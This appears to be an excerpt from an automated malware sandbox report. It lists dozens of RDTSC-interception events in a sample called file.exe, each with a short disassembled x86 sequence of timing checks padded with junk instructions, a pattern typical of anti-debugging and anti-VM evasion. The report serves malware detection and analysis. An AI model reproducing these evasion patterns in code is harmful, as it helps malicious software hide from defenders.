                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B750 second address: 105B756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050016 second address: 10500AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0C5DC268A8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f nop 0x00000010 adc di, 4BECh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0C5DC268A8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 pushad 0x00000037 mov esi, dword ptr [ebp+122D3338h] 0x0000003d jmp 00007F0C5DC268B1h 0x00000042 popad 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov ebx, dword ptr [ebp+122D18F3h] 0x00000050 mov eax, dword ptr [ebp+122D05B9h] 0x00000056 push 00000000h 0x00000058 push ebx 0x00000059 call 00007F0C5DC268A8h 0x0000005e pop ebx 0x0000005f mov dword ptr [esp+04h], ebx 0x00000063 add dword ptr [esp+04h], 00000015h 0x0000006b inc ebx 0x0000006c push ebx 0x0000006d ret 0x0000006e pop ebx 0x0000006f ret 0x00000070 mov ebx, dword ptr [ebp+122D28FAh] 0x00000076 push FFFFFFFFh 0x00000078 mov bx, 041Ch 0x0000007c nop 0x0000007d push eax 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10559F1 second address: 10559F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A04 second address: 1057A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0C5DC268A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058AA1 second address: 1058AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C64C second address: 105C6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0C5DC268B4h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F0C5DC268A8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a movsx ebx, di 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F0C5DC268A8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 add dword ptr [ebp+1245C481h], ebx 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10511E3 second address: 10511F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F0C5CBCB6C6h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A0E second address: 1057A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C6BA second address: 105C6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0C5CBCB6C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10511F6 second address: 1051209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DC268AFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A12 second address: 1057A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F0C5CBCB6E7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C5CBCB6D9h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051209 second address: 105120D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B8ED second address: 105B8F7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C5CBCB6CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F6A4 second address: 105F6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DC268B7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F6BF second address: 105F6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F6CD second address: 105F6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21DCh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E9FB second address: 105E9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E9FF second address: 105EA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105EA03 second address: 105EA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F8CA second address: 105F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105EA09 second address: 105EA1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jng 00007F0C5CC1AFC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106481C second address: 1064820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064820 second address: 1064829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FE0 second address: 1068FEC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5DBE21D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FEC second address: 1068FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068FF1 second address: 1068FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1069147 second address: 106914B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C4CD second address: 106C4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D82C second address: 100D863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0C5CC1AFCAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007F0C5CC1AFDCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F0C5CC1AFC6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D863 second address: 100D867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10745EA second address: 10745F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073417 second address: 107341B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107341B second address: 1073421 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073CC0 second address: 1073CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21E8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0C5DBE21DFh 0x00000011 jg 00007F0C5DBE21D6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073CF4 second address: 1073D00 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C5CC1AFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073E3E second address: 1073E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 jmp 00007F0C5DBE21E2h 0x0000000c jmp 00007F0C5DBE21E5h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073E6D second address: 1073E77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C5CC1AFD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073E77 second address: 1073E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0C5DBE21D6h 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107417D second address: 1074185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074185 second address: 1074189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107442F second address: 1074442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0C5CC1AFC6h 0x0000000a pop edi 0x0000000b jg 00007F0C5CC1AFCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074442 second address: 1074453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F0C5DBE21D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074453 second address: 1074457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074457 second address: 107445D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107445D second address: 107446D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007F0C5CC1AFC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107446D second address: 1074477 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C5DBE21D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074477 second address: 1074491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0C5CC1AFCBh 0x0000000a jng 00007F0C5CC1AFC6h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10088B2 second address: 10088C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F0C5DBE21D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10777B2 second address: 10777BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10777BA second address: 10777BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10777BF second address: 10777C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B5EF second address: 104B5F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B6A2 second address: 104B6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B6A6 second address: 104B6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007F0C5DBE21E8h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop ecx 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a jg 00007F0C5DBE21E2h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 je 00007F0C5DBE21E8h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B6F2 second address: 104B6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B844 second address: 104B848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B848 second address: 104B852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0C5CC1AFC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B852 second address: 104B856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B91F second address: 104B94F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0C5CC1AFD0h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B94F second address: 104B953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104B953 second address: 104B959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BBA4 second address: 104BBAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BBAA second address: 104BC2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F0C5CC1AFC6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C5CC1AFCEh 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F0C5CC1AFC8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov dx, 61CAh 0x00000033 adc cl, FFFFFF90h 0x00000036 push 00000004h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F0C5CC1AFC8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov ecx, dword ptr [ebp+122D3454h] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007F0C5CC1AFCCh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BC2A second address: 104BC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C237 second address: 104C256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C256 second address: 104C263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F0C5DBE21D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D10C second address: 102D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D111 second address: 102D12A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21E3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D12A second address: 102D12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D12E second address: 102D163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F0C5DBE21D8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F0C5DBE21E8h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D163 second address: 102D167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D167 second address: 102D16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CF4 second address: 1077D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC1AFCAh 0x00000007 jc 00007F0C5CC1AFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F0C5CC1AFC8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077D10 second address: 1077D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DBE21E9h 0x00000009 jmp 00007F0C5DBE21DAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077D37 second address: 1077D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077D3B second address: 1077D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077D46 second address: 1077D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0C5CC1AFCEh 0x00000011 jnl 00007F0C5CC1AFC8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077FFC second address: 1078015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21DAh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jp 00007F0C5DBE21DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078015 second address: 1078030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F0C5CC1AFD5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078030 second address: 1078060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DBE21E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0C5DBE21E7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107835F second address: 1078367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1078367 second address: 107836B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EB4B second address: 107EB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EB54 second address: 107EB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DBE21DBh 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EB73 second address: 107EB7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D642 second address: 107D646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DA68 second address: 107DA89 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C5CC1AFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0C5CC1AFD4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DBF6 second address: 107DC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d popad 0x0000000e push esi 0x0000000f push edx 0x00000010 jbe 00007F0C5DBE21D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
